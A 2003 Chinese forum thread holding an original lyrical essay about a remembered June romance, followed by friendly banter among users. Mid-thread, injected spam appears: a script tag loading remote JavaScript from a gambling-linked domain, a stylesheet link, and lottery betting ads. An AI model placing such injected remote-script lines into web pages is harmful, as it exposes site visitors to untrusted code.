云淡风轻 发表于 2003-6-20 17:23:00

那年六月[原创](附:蜻蜓,等待巴蒂,巴蒂-阿伦的水水)

记忆中的镜头,带着季节的声音开始转换,从一个片段到另一个片段,六月就粉墨登场。
    那一年我临渊而居
  纤细的寂寞带着我的眼睛
  投递到你的方向
  这是一种轮回没有因果
  不动声色
  寂寞的诗书翻到最后一页曰情诗的地方,多情的篇章已然印在了千年不曾改变的历史里,随着风吹的方向,层层醒来。带着恍惚的深情,打量世界。

我只是误入那个世界,九四年的美利坚之夏。这个时节和这些心绪,我带着一身的喧嚣和浮躁,惶恐不安。
  天尚未入夜,心已平静如水。
  所在的地方,不过是红尘一粟。谁和谁,都是彼此生命中的过客,没有时间制造永恒。微笑罢,且为着百年才修到的福份。
  而后,擦肩而去,不动声色。

谁曾想充斥着流光溢彩的亚平宁半岛,竟躲着那样一座幽静的小城。你站在青春的风口,笑容灿烂,一身阳光。身后的花开了一地,细碎的花朵和叶子交织成一个温柔的世界。只有花开,不闻雨声。空气静谧着,聆听着,似乎想偷窃到我如小鹿奔跑的心跳声。
  缘分被时间牵着,丢到我的面前。是拾起?还是避趋?

在某个夜里,听山风吹着叶子的声音,推开木制的窗子就可以看到明朗皎洁的月。扶窗而立,眼睛竟然看不到眼前流动的月色,只能是你一身阳光的影子;耳畔,也开始听不到蝉清脆的鸣声,只有你幽然的声音。午夜时分的平静被你打破,沧桑的身影和眼神再也撑不起行云流水的幌子。
  那么多年,终究离别。可是为何,会是在如此清幽的六月?

时间还在讲述光阴的故事,苍翠的树林之中仍然生长着淡淡的柔弱的野草,以不服输的姿势生长。恍若当年我的争执、坚持和无所谓。没有什么能够长久不变,当嫩绿的刺不小心弄破手指,鲜红的血开始渗出的时候,我才记起自己曾经说的这句话。
  留去往事的影子,揉成坚韧伤通的绳子,在一个人的日子里,用来结绳记事。将灰暗的墙,用颤抖的心事来画一幅幅结局悲伤的画。你早就注定了一个结果,远走他乡。
  只是,离去的日子里,你有没有想过摆放在原来位置的物品,那种熟识的感觉,似乎有一双温暖的手,将生命拥的紧紧的,不留一丝缝隙。直到热泪盈眶,无声的哭泣。那些瞬间,该存放着整个世界的回忆。

静坐下来,阳光会透过窗户,调皮的跳跃在房间的很多角落,且让我以一夜的苦茗,诉说半生的沧桑吧?你我都是执著而无悔的一群,以飘零作归宿吗?只有大彻大悟,经历大爱大恨后才能有的结论。那是简贞,那不是你我。你我,只是弱小的人群,在自己的爱恨里浮沉,不能超脱。

初夏的空气很好,不是太过于炎热。今年的岁月比较难以琢磨,如同见到你俊朗的面容那一瞬间我的心情。眉眼之间尽是慌乱。缘分,是那隔夜的茶,被泅在心里。再也没有谁能够如你趁人不备地把一片冰心掷入我的壶。
  这是一场局,结果早就注定在流转的年月里。

或许将来某日的夜里,我将发髻轻挽上去,用苍老的容颜对你诉说一个风花雪月的故事。你会微笑,然后凝视着我脸庞上岁月的痕迹,娓娓的给我讲述那年初夏的故事,没有情节,只有主角。恋一个天长地久的承诺,穿越城市恋恋不舍的灯色,将思绪又带到那一年。
  那些,都只是思念渡船里的山盟,被生命的雨水打湿。飘零是借口,我从不曾安慰好柔弱的心。只好,任雨打风吹,看满目沧桑。

夏日里也有掩藏不住的凄冷。独自而行,路,不过是蜿蜒曲折的心径,将婉约的心事一一诱惑出来,丢在满眼的秀色中嘲弄。谁都是凡夫俗子,怎能修改自己的征服与奢求?
  于是,在季节的流转之中,我依稀梦醒。恍惚的眼神里,清澈的水已波澜不熄,犹自念着那年的六月。
  四季的心情都不肯晴朗,六月的期待怎能成真?

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

~金~~~时~彩~

~合~投~注~~

batistubi 发表于 2003-6-20 22:12:00

美文啊!
第一个来顶!

云淡风轻 发表于 2003-6-21 12:10:00

居然没人看,郁闷~~
自己顶~~

bati_24 发表于 2003-6-21 14:11:00

小羽 发表于 2003-6-21 15:52:00

鲜花送上!!!
云淡风轻MM总可以道出一些莫可名状的情绪……厉害~~~

等待巴蒂 发表于 2003-6-21 22:06:00

混血mm还是才女,失敬失敬

星空蜻蜓 发表于 2003-6-21 22:44:00

MM这段时间佳作不断

云淡风轻 发表于 2003-6-22 01:26:00

以下是引用等待巴蒂在2003-6-21 22:06:00的发言:
混血mm还是才女,失敬失敬

汗~~才女不敢当,做菜女还差不多:)

等待巴蒂 发表于 2003-6-22 01:27:00

怎么都这么谦虚呀!!!小蜻蜓,学学别人!!

星空蜻蜓 发表于 2003-6-22 01:32:00

以下是引用等待巴蒂在2003-6-22 1:27:00的发言:

那我就做 "豺女 "好拉

难道我很不谦虚吗

等待巴蒂 发表于 2003-6-22 01:39:00

以下是引用星空蜻蜓在2003-6-22 1:32:00的发言:
以下是引用等待巴蒂在2003-6-22 1:27:00的发言:

难道我很不谦虚吗

这句话足够看出你不谦虚了!!:)

星空蜻蜓 发表于 2003-6-22 01:41:00

谦虚者往往有足够骄傲的资本

所以..我不谦虚..是可以理解的

等待巴蒂 发表于 2003-6-22 01:43:00

那你到底是谦虚还是不谦虚列?
我被你说晕了!

星空蜻蜓 发表于 2003-6-22 01:45:00

oh~原来我说话有点深奥哦~~

可以..最好从辨证思维的角度理解谦虚者的背后是自信的骄傲 而自负者往往源于自卑
明白了吗

最近考试多了 思想还没恢复过来

等待巴蒂 发表于 2003-6-22 01:50:00

不行了,真晕了!

云淡风轻 发表于 2003-6-22 01:52:00

大家今天吃兴奋剂了么,都好GRAZY呀~~

等待巴蒂 发表于 2003-6-22 01:55:00

偶尔crazy一下有益身体健康!
mm也一起来!

云淡风轻 发表于 2003-6-22 01:57:00

汗~~跟你们不是一条水平线上的,偶退避三舍~~

等待巴蒂 发表于 2003-6-22 01:58:00

高我们一级的水手????久仰久仰!!

云淡风轻 发表于 2003-6-22 02:00:00

倾倒ING~~我真无话可说了~~

星空蜻蜓 发表于 2003-6-22 02:00:00

呵呵

难得糊涂~~@@~

等待巴蒂 发表于 2003-6-22 02:02:00

无话可说还是满肚子话不知怎么说????

星空蜻蜓 发表于 2003-6-22 02:03:00

主要是我来了才 Crazy吧

西西 ^^

云淡风轻 发表于 2003-6-22 02:05:00

以下是引用等待巴蒂在2003-6-22 2:02:00的发言:
无话可说还是满肚子话不知怎么说????

你就高抬贵手吧,偶是旱鸭子
最怕ADD WATER了

等待巴蒂 发表于 2003-6-22 02:05:00

mm好象还算掉了我!
页: [1] 2 3 4 5 6 7 8 9
查看完整版本: 那年六月[原创](附:蜻蜓,等待巴蒂,巴蒂-阿伦的水水)